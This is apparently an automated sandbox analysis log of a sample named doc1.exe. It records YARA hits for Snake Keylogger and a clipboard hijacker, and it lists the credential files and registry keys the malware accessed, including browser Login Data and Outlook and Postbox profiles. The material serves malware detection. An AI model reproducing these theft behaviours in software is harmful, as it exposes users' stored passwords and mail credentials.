                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\doc1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Clipboard Hijacker
                  Source: Yara matchFile source: 12.2.MSBuild.exe.9d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2456553798.00000000009D2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4896, type: MEMORYSTR
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 21.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3461729638.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.3442856723.000000000041A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.3460895487.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.3460956266.000000000301B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.3460895487.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.3460956266.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1596, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1596, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 21.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3461729638.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.3442856723.000000000041A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.3460895487.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
